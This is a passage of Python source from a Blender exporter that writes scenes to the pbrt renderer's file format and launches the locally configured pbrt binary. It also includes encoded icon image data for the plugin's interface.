v2 = exportVerts[exportVIndex]
if (length==len(v2)) and (v == v2):
newExportVIndex = exportVIndex
break
if (newExportVIndex < 0):
newExportVIndex = len(exportVerts)
exportVerts.append(v)
while blenderVIndex >= len(blenderExportVertexMap):
blenderExportVertexMap.append([])
blenderExportVertexMap[blenderVIndex].append(newExportVIndex)
exportVIndices.append(newExportVIndex)
index += 1
exportFaces.append(exportVIndices)
if (len(exportVerts)>0):
mesh_str = self.getMeshType(len(exportVerts), mats[matIndex])
if (portal):
file.write("\tPortalShape %s \"integer indices\" [\n"% mesh_str)
else:
file.write("\tShape %s \"integer indices\" [\n"% mesh_str)
for face in exportFaces:
file.write("%d %d %d\n"%(face[0], face[1], face[2]))
if (len(face)==4):
file.write("%d %d %d\n"%(face[0], face[2], face[3]))
file.write("\t] \"point P\" [\n")
# for vertex in exportVerts:
# file.write("%f %f %f\n"%(vertex[0], vertex[1], vertex[2]))
file.write("".join(["%f %f %f\n"%tuple(vertex[0]) for vertex in exportVerts]))
if normalFltr[shape]:
file.write("\t] \"normal N\" [\n")
# for vertex in exportVerts:
# file.write("%f %f %f\n"%(vertex[3], vertex[4], vertex[5]))
file.write("".join(["%f %f %f\n"%tuple(vertex[1]) for vertex in exportVerts]))
if (uvFltr[shape]) and (mesh.faceUV):
file.write("\t] \"float uv\" [\n")
# for vertex in exportVerts:
# file.write("%f %f\n"%(vertex[6], vertex[7]))
file.write("".join(["%f %f\n"%tuple(vertex[2]) for vertex in exportVerts]))
else:
if (uvFltr[shape]) and (mesh.faceUV):
file.write("\t] \"float uv\" [\n")
# for vertex in exportVerts:
# file.write("%f %f\n"%(vertex[3], vertex[4]))
file.write("".join(["%f %f\n"%tuple(vertex[1]) for vertex in exportVerts]))
file.write("\t]\n")
print(" shape(%s): %d vertices, %d faces"%(shapeText[shape], len(exportVerts), len(exportFaces)))
#-------------------------------------------------
# exportMeshes(self, file)
# exports meshes that uses instancing (meshes that are used by at least "instancing_threshold" objects)
#-------------------------------------------------
def exportMeshes(self, file):
scn = Scene.GetCurrent()
instancing_threshold = luxProp(scn, "instancing_threshold", 2).get()
mesh_optimizing = luxProp(scn, "mesh_optimizing", True).get()
mesh = Mesh.New('')
for (mesh_name, objs) in self.meshes.items():
allow_instancing = True
mats = getMaterials(objs[0]) # mats = obj.getData().getMaterials()
for mat in mats: # don't instance if one of the materials is emissive
if (mat!=None) and (luxProp(mat, "type", "").get()=="light"):
allow_instancing = False
for obj in objs: # don't instance if the objects with same mesh uses different materials
ms = getMaterials(obj)
if ms != mats:
allow_instancing = False
if obj.modifiers.__len__() > 0:
allow_instancing = False
if allow_instancing and (len(objs) > instancing_threshold):
del self.meshes[mesh_name]
mesh.getFromObject(objs[0], 0, 1)
print("blender-mesh: %s (%d vertices, %d faces)"%(mesh_name, len(mesh.verts), len(mesh.faces)))
file.write("ObjectBegin \"%s\"\n"%mesh_name)
self.exportMeshOpt(file, mesh, mats, mesh_name)
file.write("ObjectEnd # %s\n\n"%mesh_name)
mesh.verts = None
#-------------------------------------------------
# exportObjects(self, file)
# exports objects to the file
#-------------------------------------------------
def exportObjects(self, file):
scn = Scene.GetCurrent()
cam = scn.getCurrentCamera().data
objectmblur = luxProp(cam, "objectmblur", "true")
usemblur = luxProp(cam, "usemblur", "false")
mesh_optimizing = luxProp(scn, "mesh_optimizing", True).get()
mesh = Mesh.New('')
for [obj, matrix] in self.objects:
print("object: %s"%(obj.getName()))
mesh_name = obj.getData(name_only=True)
motion = None
if(objectmblur.get() == "true" and usemblur.get() == "true"):
# motion blur
frame = Blender.Get('curframe')
Blender.Set('curframe', frame+1)
m1 = 1.0*matrix # multiply by 1.0 to get a copy of orignal matrix (will be frame-independant)
Blender.Set('curframe', frame)
if m1 != matrix:
print(" motion blur")
motion = m1
if motion: # motion-blur only works with instances, so ensure mesh is exported as instance first
if mesh_name in self.meshes:
del self.meshes[mesh_name]
mesh.getFromObject(obj, 0, 1)
mats = getMaterials(obj)
print(" blender-mesh: %s (%d vertices, %d faces)"%(mesh_name, len(mesh.verts), len(mesh.faces)))
file.write("ObjectBegin \"%s\"\n"%mesh_name)
self.exportMeshOpt(file, mesh, mats, mesh_name)
file.write("ObjectEnd # %s\n\n"%mesh_name)
file.write("AttributeBegin # %s\n"%obj.getName())
if motion:
file.write("\tActiveTransform StartTime\n")
file.write("\tTransform [%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s]\n"\
%(matrix[0][0], matrix[0][1], matrix[0][2], matrix[0][3],\
matrix[1][0], matrix[1][1], matrix[1][2], matrix[1][3],\
matrix[2][0], matrix[2][1], matrix[2][2], matrix[2][3],\
matrix[3][0], matrix[3][1], matrix[3][2], matrix[3][3]))
if motion:
file.write("\tActiveTransform EndTime\n")
file.write("\t\tTransform [%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s]\n"\
%(motion[0][0], motion[0][1], motion[0][2], motion[0][3],\
motion[1][0], motion[1][1], motion[1][2], motion[1][3],\
motion[2][0], motion[2][1], motion[2][2], motion[2][3],\
motion[3][0], motion[3][1], motion[3][2], motion[3][3]))
file.write("\tActiveTransform All\n")
if mesh_name in self.meshes:
mesh.getFromObject(obj, 0, 1)
mats = getMaterials(obj)
print(" blender-mesh: %s (%d vertices, %d faces)"%(mesh_name, len(mesh.verts), len(mesh.faces)))
self.exportMeshOpt(file, mesh, mats, mesh_name)
else:
print(" instance %s"%(mesh_name))
file.write("\tObjectInstance \"%s\"\n"%mesh_name)
file.write("AttributeEnd\n\n")
mesh.verts = None
#-------------------------------------------------
# exportLights(self, file)
# exports lights to the file
#-------------------------------------------------
def exportLights(self, file):
for [obj, matrix] in self.lights:
ltype = obj.getData(mesh=1).getType() # data
if (ltype == Lamp.Types["Lamp"]) or (ltype == Lamp.Types["Spot"]) or (ltype == Lamp.Types["Area"]):
print("light: %s"%(obj.getName()))
if ltype == Lamp.Types["Area"]:
(str, link) = luxLight("", "", obj, None, 0)
file.write(str)
if ltype == Lamp.Types["Area"]: file.write("AttributeBegin # %s\n"%obj.getName())
else: file.write("TransformBegin # %s\n"%obj.getName())
file.write("\tTransform [%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s]\n"\
%(matrix[0][0], matrix[0][1], matrix[0][2], matrix[0][3],\
matrix[1][0], matrix[1][1], matrix[1][2], matrix[1][3],\
matrix[2][0], matrix[2][1], matrix[2][2], matrix[2][3],\
matrix[3][0], matrix[3][1], matrix[3][2], matrix[3][3]))
col = obj.getData(mesh=1).col # data
energy = obj.getData(mesh=1).energy # data
if ltype == Lamp.Types["Lamp"]:
# lightgroup = luxProp(obj, "light.lightgroup", "default")
(str, link) = luxLamp("", "", obj, None, 0)
file.write(str+"LightSource \"point\""+link+"\n")
if ltype == Lamp.Types["Spot"]:
(str, link) = luxSpot("", "", obj, None, 0)
file.write(str)
proj = luxProp(obj, "light.usetexproj", "false")
# if luxProp(Scene.GetCurrent(), "nolg", "false").get()!="true":
# lightgroup = luxProp(obj, "light.lightgroup", "default")
if(proj.get() == "true"):
file.write("Rotate 180 0 1 0\n")
file.write("LightSource \"projection\" \"float fov\" [%f]"%(obj.getData(mesh=1).spotSize))
else:
file.write("LightSource \"spot\" \"point from\" [0 0 0] \"point to\" [0 0 -1] \"float coneangle\" [%f] \"float conedeltaangle\" [%f]"\
%(obj.getData(mesh=1).spotSize*0.5, obj.getData(mesh=1).spotSize*0.5*obj.getData(mesh=1).spotBlend)) # data
file.write(link+"\n")
if ltype == Lamp.Types["Area"]:
# lightgroup = luxProp(obj, "light.lightgroup", "default")
file.write("\tAreaLightSource \"diffuse\"")
file.write(link)
# file.write(luxLight("", "", obj, None, 0))
file.write("\n")
areax = obj.getData(mesh=1).getAreaSizeX()
# lamps "getAreaShape()" not implemented yet - so we can't detect shape! Using square as default
# todo: ideasman42
if (True): areay = areax
else: areay = obj.getData(mesh=1).getAreaSizeY()
file.write('\tShape "trianglemesh" "integer indices" [0 1 2 0 2 3] "point P" [-%(x)f %(y)f 0.0 %(x)f %(y)f 0.0 %(x)f -%(y)f 0.0 -%(x)f -%(y)f 0.0]\n'%{"x":areax/2, "y":areay/2})
if ltype == Lamp.Types["Area"]: file.write("AttributeEnd # %s\n"%obj.getName())
else: file.write("TransformEnd # %s\n"%obj.getName())
file.write("\n")
#-------------------------------------------------
# exportVolumes(self, file)
# exports volumes to the file
#-------------------------------------------------
def exportVolumes(self, file):
for [obj, matrix] in self.volumes:
print("volume: %s"%(obj.getName()))
file.write("# Volume: %s\n"%(obj.getName()))
# trickery to obtain objectspace boundingbox AABB
mat = obj.matrixWorld.copy().invert()
bb = [vec * mat for vec in obj.getBoundBox()]
minx = miny = minz = 100000000000000.0
maxx = maxy = maxz = -100000000000000.0
for vec in bb:
if (vec[0] < minx): minx = vec[0]
if (vec[1] < miny): miny = vec[1]
if (vec[2] < minz): minz = vec[2]
if (vec[0] > maxx): maxx = vec[0]
if (vec[1] > maxy): maxy = vec[1]
if (vec[2] > maxz): maxz = vec[2]
file.write("Transform [%s %s %s %s %s %s %s %s %s %s %s %s %s %s %s %s]\n"\
%(matrix[0][0], matrix[0][1], matrix[0][2], matrix[0][3],\
matrix[1][0], matrix[1][1], matrix[1][2], matrix[1][3],\
matrix[2][0], matrix[2][1], matrix[2][2], matrix[2][3],\
matrix[3][0], matrix[3][1], matrix[3][2], matrix[3][3]))
str_opt = (" \"point p0\" [%f %f %f] \"point p1\" [%f %f %f]"%(minx, miny, minz, maxx, maxy, maxz))
mats = getMaterials(obj)
if (len(mats)>0) and (mats[0]!=None) and (luxProp(mats[0], "type", "").get()=="boundvolume"):
mat = mats[0]
(str, link) = luxMaterialBlock("", "", "", mat, None, 0, str_opt)
file.write("%s"%link)
file.write("\n\n")
######################################################
# EXPORT
######################################################
def save_lux(filename, unindexedname):
export_total_steps = 12.0
global meshlist, matnames, lxs_filename, geom_filename, geom_pfilename, mat_filename, mat_pfilename, vol_filename, vol_pfilename, LuxIsGUI
global render_status_text
global render_status
render_status_text = 'Exporting...'
render_status = True
print("pbrt export started...\n")
time1 = Blender.sys.time()
scn = Scene.GetCurrent()
filepath = os.path.dirname(filename)
filebase = os.path.splitext(os.path.basename(filename))[0]
lxs_filename = filename
geom_filename = os.path.join(filepath, filebase + "-geom.pbrt")
geom_pfilename = filebase + "-geom.pbrt"
mat_filename = os.path.join(filepath, filebase + "-mat.pbrt")
mat_pfilename = filebase + "-mat.pbrt"
vol_filename = os.path.join(filepath, filebase + "-vol.pbrt")
vol_pfilename = filebase + "-vol.pbrt"
### Zuegs: initialization for export class
export = luxExport(Blender.Scene.GetCurrent())
# check if a light is present
envtype = luxProp(scn, "env.type", "infinite").get()
if envtype == "sunsky":
print("WARNING: sunsky lights not supported")
if not(export.analyseScene()) and not(envtype == "infinite") and not((envtype == "sunsky") and (sun != None)):
print("ERROR: No light source found")
Draw.PupMenu("ERROR: No light source found%t|OK%x1")
render_status_text = ''
render_status = False
Blender.Window.QRedrawAll()
del export
return False
if LuxIsGUI: DrawProgressBar(0.0/export_total_steps,'Setting up Scene file')
class output_proxy():
load_result = False
combine_all_output = False
f = None
def close(self):
if self.f is not None: self.f.close()
def write(self, str):
if self.f is not None:
self.f.write(str)
self.f.flush()
class file_output(output_proxy):
def __init__(self,filename):
self.f = open(filename, "w")
from threading import Thread
class pipe_output(output_proxy, Thread):
combine_all_output = True
def __init__(self, xr,yr, haltspp, filename):
Thread.__init__(self)
self.filename = filename
self.haltspp = haltspp
self.xr = xr
self.yr = yr
bintype = "pbrt"
self.load_result = True
print("pipe: using %s" % bintype)
self.p = get_lux_pipe(scn, 1, bintype)
self.f = self.p.stdin
def close(self):
global render_status_text
global render_status
render_status = True
render_status_text = "Rendering ..."
Blender.Window.QRedrawAll()
self.start()
def run(self):
if self.load_result: self.data = self.p.communicate()[0]
self.f.close()
if self.load_result: # self.load_image()
self.load_data()
print("LuxRender process finished")
self.update_status()
def load_image(self):
i = Blender.Image.Load(self.filename)
i.makeCurrent()
i.reload()
def load_data(self):
print("processing %i image bytes" % len(self.data))
i = Blender.Image.New('pbrt', self.xr, self.yr, 32)
raw_image = []
for j in self.data:
raw_image.append(ord(j))
del self.data
bi = 0
for y in range(self.yr-1, -1, -1):
for x in range(0, self.xr):
i.setPixelI(x,y, raw_image[bi:bi+3]+[0])
bi+=3
i.makeCurrent()
def update_status(self):
global render_status_text
global render_status
render_status = False
render_status_text = "Rendering complete"
render_status_text += ", check Image Editor window"
Blender.Window.QRedrawAll()
use_pipe_output = luxProp(scn, "pipe", "false").get() == "true" and luxProp(scn, "run", "true").get() == "true"
file = output_proxy()
if luxProp(scn, "lxs", "true").get()=="true" or use_pipe_output:
##### Determine/open files
if use_pipe_output:
print("using pipe output")
print("Exporting scene to pipe")
xr,yr = get_render_resolution(scn)
file = pipe_output(xr, yr,
luxProp(scn, "haltspp", 0).get(),
os.path.join(filepath, filebase + ".png")
)
else:
print("using file output")
print("Exporting scene to '" + filename + "'...\n")
file = file_output(filename)
##### Write Header ######
file.write("# pbrt v2.0 Scene File\n")
file.write("# Exported by pbrtBlend Blender Exporter\n")
file.write("\n")
##### Write camera ######
camObj = scn.getCurrentCamera()
if LuxIsGUI: DrawProgressBar(1.0/export_total_steps,'Exporting Camera')
if camObj:
print("processing Camera...")
cam = camObj.data
cammblur = luxProp(cam, "cammblur", "true")
usemblur = luxProp(cam, "usemblur", "false")
matrix = camObj.getMatrix()
motion = None
file.write("Scale -1 1 1 # account for fixed lookat bug...\n")
if(cammblur.get() == "true" and usemblur.get() == "true"):
# motion blur
frame = Blender.Get('curframe')
Blender.Set('curframe', frame+1)
m1 = 1.0*matrix # multiply by 1.0 to get a copy of original matrix (will be frame-independant)
Blender.Set('curframe', frame)
if m1 != matrix:
# Motion detected, write endtransform
print(" motion blur")
motion = m1
pos = m1[3]
forwards = -m1[2]
target = pos + forwards
up = m1[1]
file.write("TransformBegin\n")
file.write(" ActiveTransform EndTime\n")
file.write(" LookAt %f %f %f \n %f %f %f \n %f %f %f\n" % ( pos[0], pos[1], pos[2], target[0], target[1], target[2], up[0], up[1], up[2] ))
file.write("TransformEnd\n\n")
# Write original lookat transform
pos = matrix[3]
forwards = -matrix[2]
target = pos + forwards
up = matrix[1]
if motion:
file.write("ActiveTransform StartTime\n")
file.write("LookAt %f %f %f \n %f %f %f \n %f %f %f\n\n" % ( pos[0], pos[1], pos[2], target[0], target[1], target[2], up[0], up[1], up[2] ))
file.write(luxCamera(camObj.data, scn.getRenderingContext()))
if motion:
file.write("\nActiveTransform All\n")
file.write("\n")
file.write("\n")
if LuxIsGUI: DrawProgressBar(2.0/export_total_steps,'Exporting Film Settings')
##### Write film ######
file.write(luxFilm(scn))
file.write("\n")
if LuxIsGUI: DrawProgressBar(3.0/export_total_steps,'Exporting Pixel Filter')
##### Write Pixel Filter ######
file.write(luxPixelFilter(scn))
file.write("\n")
if LuxIsGUI: DrawProgressBar(4.0/export_total_steps,'Exporting Sampler')
##### Write Sampler ######
file.write(luxSampler(scn))
file.write("\n")
if LuxIsGUI: DrawProgressBar(5.0/export_total_steps,'Exporting Surface Integrator')
##### Write Surface Integrator ######
file.write(luxSurfaceIntegrator(scn))
file.write("\n")
if LuxIsGUI: DrawProgressBar(6.0/export_total_steps,'Exporting Volume Integrator')
##### Write Volume Integrator ######
file.write(luxVolumeIntegrator(scn))
file.write("\n")
if LuxIsGUI: DrawProgressBar(6.0/export_total_steps,'Exporting Renderer')
##### Write Renderer (maybe) ######
file.write(luxRenderer(scn))
file.write("\n")
########## BEGIN World
file.write("\n")
file.write("WorldBegin\n")
file.write("\n")
########## World scale
#scale = luxProp(scn, "global.scale", 1.0).get()
#if scale != 1.0:
# # TODO: not working yet !!!
# # TODO: propabily scale needs to be applyed on camera coords too
# file.write("Transform [%s 0.0 0.0 0.0 0.0 %s 0.0 0.0 0.0 0.0 %s 0.0 0.0 0.0 0 1.0]\n"%(scale, scale, scale))
# file.write("\n")
if LuxIsGUI: DrawProgressBar(8.0/export_total_steps,'Exporting Environment')
##### Write World Background, Sunsky or Env map ######
env = luxEnvironment(scn)
if env != "":
file.write("AttributeBegin\n")
file.write(env)
file.write("AttributeEnd\n")
file.write("\n")
#### Write material & geometry file includes in scene file
if not file.combine_all_output: file.write("Include \"%s\"\n\n" %(mat_pfilename))
if not file.combine_all_output: file.write("Include \"%s\"\n\n" %(geom_pfilename))
if not file.combine_all_output: file.write("Include \"%s\"\n\n" %(vol_pfilename))
if luxProp(scn, "lxm", "true").get()=="true" or use_pipe_output:
if LuxIsGUI: DrawProgressBar(9.0/export_total_steps,'Exporting Materials')
##### Write Material file #####
if not file.combine_all_output: print("Exporting materials to '" + mat_filename + "'...\n")
mat_file = open(mat_filename, 'w') if not file.combine_all_output else file
mat_file.write("")
export.exportMaterials(mat_file)
mat_file.write("")
if not file.combine_all_output: mat_file.close()
if luxProp(scn, "lxo", "true").get()=="true" or use_pipe_output:
if LuxIsGUI: DrawProgressBar(10.0/export_total_steps,'Exporting Geometry')
##### Write Geometry file #####
if not file.combine_all_output: print("Exporting geometry to '" + geom_filename + "'...\n")
geom_file = open(geom_filename, 'w') if not file.combine_all_output else file
meshlist = []
geom_file.write("")
export.exportLights(geom_file)
export.exportMeshes(geom_file)
export.exportObjects(geom_file)
geom_file.write("")
if not file.combine_all_output: geom_file.close()
if luxProp(scn, "lxv", "true").get()=="true" or use_pipe_output:
if LuxIsGUI: DrawProgressBar(11.0/export_total_steps,'Exporting Volumes')
##### Write Volume file #####
if not file.combine_all_output: print("Exporting volumes to '" + vol_filename + "'...\n")
vol_file = open(vol_filename, 'w') if not file.combine_all_output else file
meshlist = []
vol_file.write("")
export.exportVolumes(vol_file)
vol_file.write("")
if not file.combine_all_output: vol_file.close()
render_status_text = ''
render_status = False
Blender.Window.QRedrawAll()
if luxProp(scn, "lxs", "true").get()=="true" or use_pipe_output:
#### Write End Tag
file.write("WorldEnd\n\n")
file.close()
if LuxIsGUI: DrawProgressBar(12.0/export_total_steps,'Export Finished')
print("Finished.\n")
del export
time2 = Blender.sys.time()
print("Processing time: %f\n" %(time2-time1))
if use_pipe_output:
#if luxProp(scn, "haltspp", 0).get() > 0:
# Wait for piped luxconsole render thread to end
file.join()
# Don't launch it again as a piped scene is started implicitly
return False
return True
#########################################################################
### LAUNCH LuxRender AND RENDER CURRENT SCENE
#########################################################################
def get_lux_exec(scn, type="luxrender"):
#get blenders 'bpydata' directory
datadir=Blender.Get("datadir")
ic = luxProp(scn, "pbrt", "").get()
ic = Blender.sys.dirname(ic) + os.sep + "pbrt"
if osys.platform == "win32": ic = ic + ".exe"
# if osys.platform == "darwin": ic = ic + ".app/Contents/MacOS/luxrender"
return ic
def get_lux_args(filename, extra_args=[], anim=False):
ostype = osys.platform
scn = Scene.GetCurrent()
ic = get_lux_exec(scn, type=(anim and 'luxconsole' or 'luxrender'))
checkluxpath = luxProp(scn, "checkluxpath", True).get()
if checkluxpath:
if sys.exists(ic) != 1:
Draw.PupMenu("Error: Lux renderer not found. Please set path on System page.%t|OK")
return
lux_args = "\"%s\" " % ic
lux_args2 = ' '.join(extra_args)
if filename == '-':
lux_args2 = " - " + lux_args2
else:
filename = "\"%s\"" % filename
lux_args2 = lux_args2 + filename
lux_args += lux_args2
if ostype == "win32":
prio = ""
if luxnice > 15: prio = "/low"
elif luxnice > 5: prio = "/belownormal"
elif luxnice > -5: prio = "/normal"
elif luxnice > -15: prio = "/abovenormal"
else: prio = "/high"
if not anim:
cmd = "start /b %s \"\" %s" % (prio, lux_args)
else:
cmd = "start /WAIT %s \"\" %s" % (prio, lux_args)
# if ostype == "linux2" or ostype == "darwin":
else:
if not anim:
cmd = "(nice -n %d %s)&"%(luxnice, lux_args)
else:
cmd = "(nice -n %d %s)"%(luxnice, lux_args)
return cmd, lux_args2
def get_lux_pipe(scn, buf = 1024, type="luxconsole"):
bin = "\"%s\"" % get_lux_exec(scn, type)
print("piping to pbrt binary: " + bin)
PIPE = subprocess.PIPE
cmd, raw_args = get_lux_args('-',
extra_args=['-b'] if type=="luxconsole" else []
)
return subprocess.Popen(bin + raw_args, shell=True, bufsize=buf, stdin=PIPE, stdout=PIPE, stderr=PIPE)
def launchLux(filename):
cmd, raw_args = get_lux_args(filename, extra_args=[])
print("Running pbrt:\n"+cmd)
os.system(cmd)
def launchLuxWait(filename, anim=False):
ostype = osys.platform
cmd, raw_args = get_lux_args(filename, extra_args=[], anim=anim)
if ostype == "win32":
os.system(cmd)
# if ostype == "linux2" or ostype == "darwin":
else:
subprocess.call(cmd,shell=True)
#### SAVE ANIMATION ####
#def save_anim(filename):
# global LuxIsGUI
# scn = Scene.GetCurrent()
# to = luxProp(scn, 'export.threaded', 'true').get()
# run = luxProp(scn, "run", "true").get()
# deflt = luxProp(scn, "default", "true").get()
# if to == 'true' and run == 'true' and deflt == 'false':
# import threading
# anim_thread = threading.Thread(target=save_anim_real, args=(filename,True))
# anim_thread.start()
# else:
# save_anim_real(filename)
def save_anim(filename, as_thread=False):
if as_thread: print('SAR thread started')
global MatSaved, LuxIsGUI
MatSaved = 0
startF = Blender.Get('staframe')
endF = Blender.Get('endframe')
scn = Scene.GetCurrent()
Run = luxProp(scn, "run", "true").get()
if Run == "true":
haltspp = luxProp(scn, "haltspp", 0).get()
if haltspp == 0:
Draw.PupMenu("ERROR: You must set a limit for spp (Output->halt) when doing animation and the 'run' flag is switched on")
if LuxIsGUI:
Draw.Redraw()
return
print("\n\nRendering animation (frame %i to %i)\n\n"%(startF, endF))
v_frame = Blender.Get('curframe')
for i in range (startF, endF+1):
# Seems to get stuck unless we redraw the UI
# if LuxIsGUI:
# Window.QRedrawAll()
Blender.Set('curframe', i)
print("Rendering frame %i"%(i))
Blender.Redraw()
frameindex = ("-%05d" % (i)) + ".pbrt"
indexedname = sys.makename(filename, frameindex)
unindexedname = filename
luxProp(scn, "filename", Blender.Get("filename")).set(sys.makename(filename, "-%05d" % (Blender.Get('curframe'))))
if Run == "true":
if save_lux(filename, unindexedname):
launchLuxWait(filename, anim=True)
else:
save_lux(indexedname, unindexedname)
MatSaved = 1
# Seems to get stuck unless we redraw the UI
# if LuxIsGUI:
# Window.QRedrawAll()
Blender.Set('curframe', v_frame)
print("\n\nFinished Rendering animation\n")
if as_thread: print('SAR thread finished')
#### SAVE STILL (hackish...) ####
#import threading
#def save_still(filename):
# global LuxIsGUI
# scn = Scene.GetCurrent()
# to = luxProp(scn, 'export.threaded', 'true').get()
# if to == 'true' and luxProp(scn, "run", "true").get() == "true":
# import threading
# still_thread = threading.Thread(target=save_still_real, args=(filename,))
# still_thread.start()
# else:
# save_still_real(filename)
def save_still(filename):
global MatSaved, runRenderAfterExport
scn = Scene.GetCurrent()
luxProp(scn, "filename", Blender.Get("filename")).set(sys.makename(filename, ""))
MatSaved = 0
unindexedname = filename
# Seems to get stuck unless we redraw the UI
# if LuxIsGUI:
# Window.QRedrawAll()
if save_lux(filename, unindexedname):
if runRenderAfterExport and luxProp(scn, "pipe", "false").get() == "false": #(run == None and luxProp(scn, "run", "true").get() == "true") or run:
launchLux(filename)
# Seems to get stuck unless we redraw the UI
# if LuxIsGUI:
# Window.QRedrawAll()
######################################################
# Icons
######################################################
def base64value(char):
if 64 < ord(char) < 91: return ord(char)-65
if 96 < ord(char) < 123: return ord(char)-97+26
if 47 < ord(char) < 58: return ord(char)-48+52
if char == '+': return 62
return 63
def decodeIconStr(s):
buf = BGL.Buffer(BGL.GL_BYTE, [16,16,4])
offset = 0
for y in range(16):
for x in range(16):
for c in range(4):
buf[y][x][c] = int(base64value(s[offset])*4.048)
offset += 1
return buf
def decodeLogoStr(s):
buf = BGL.Buffer(BGL.GL_BYTE, [18,118,4])
offset = 0
for y in range(18):
for x in range(118):
for c in range(4):
buf[y][x][c] = int(base64value(s[offset])*4.048)
offset += 1
return buf
def decodeArrowStr(s):
buf = BGL.Buffer(BGL.GL_BYTE, [22,22,4])
offset = 0
for y in range(22):
for x in range(22):
for c in range(4):
buf[y][x][c] = int(base64value(s[offset])*4.048)
offset += 1
return buf
def decodeBarStr(s):
buf = BGL.Buffer(BGL.GL_BYTE, [17,138,4])
offset = 0
for y in range(17):
for x in range(138):
for c in range(4):
buf[y][x][c] = int(base64value(s[offset])*4.048)
offset += 1
return buf
arrow_down = decodeArrowStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///Q///G///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///3///e///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///V///////7///D///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///1///////////e///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///a///////////////7///C///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///B///5///////////////////c///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///f///////////////////////7///C///A///A///A///A///A///A///A///A///A///A///A///A///A///C///6///////////////////////////c///A///A///A///A///A///A///A///A///A///A///A///A///A///i///////////////////////////////6///C///A///A///A///A///A///A///A///A///A///A///A///G///9///////////////////////////////////e///A///A///A///A///A///A///A///A///A///A///I///n///////////////////////////////////////6///N///A///A///A///A///A///A///A///A///A///L///b///e///e///e///e///e///e///e///e///e///g///O///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
arrow_right = decodeArrowStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///L///I///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///b///n///G///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///e///////9///i///C///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///e///////////////6///f///B///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///e///////////////////////5///a///A///A///A///A///A///A///A///A///A///A///A///A///A///A///e///////////////////////////////1///V///A///A///A///A///A///A///A///A///A///A///A///A///e///////////////////////////////////////3///Q///A///A///A///A///A///A///A///A///A///A///e///////////////////////////////////7///e///G///A///A///A///A///A///A///A///A///A///A///e///////////////////////////7///e///D///A///A///A///A///A///A///A///A///A///A///A///A///e///////////////////7///c///C///A///A///A///A///A///A///A///A///A///A///A///A///A///A///e///////////6///c///C///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///g///6///e///C///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///O///N///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A")
icon_luxblend = decodeLogoStr("///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A/gAA/gAA/gAA/gAA/gAA/gAA/gAa/gA5/gAZ/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A/gAA/gAA/gAA/gAA/gAA/gAA/gAj/gA//gAh/gAA/gAA/gAA/gAA/gAA/gAA/gAA/gAA///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A///A/gAA/gAA/gAA/gAA/gAA/gAA/gAC/gAO/gAC/gAB/gAS/gAQ/gAA/gAA/gAA/gAA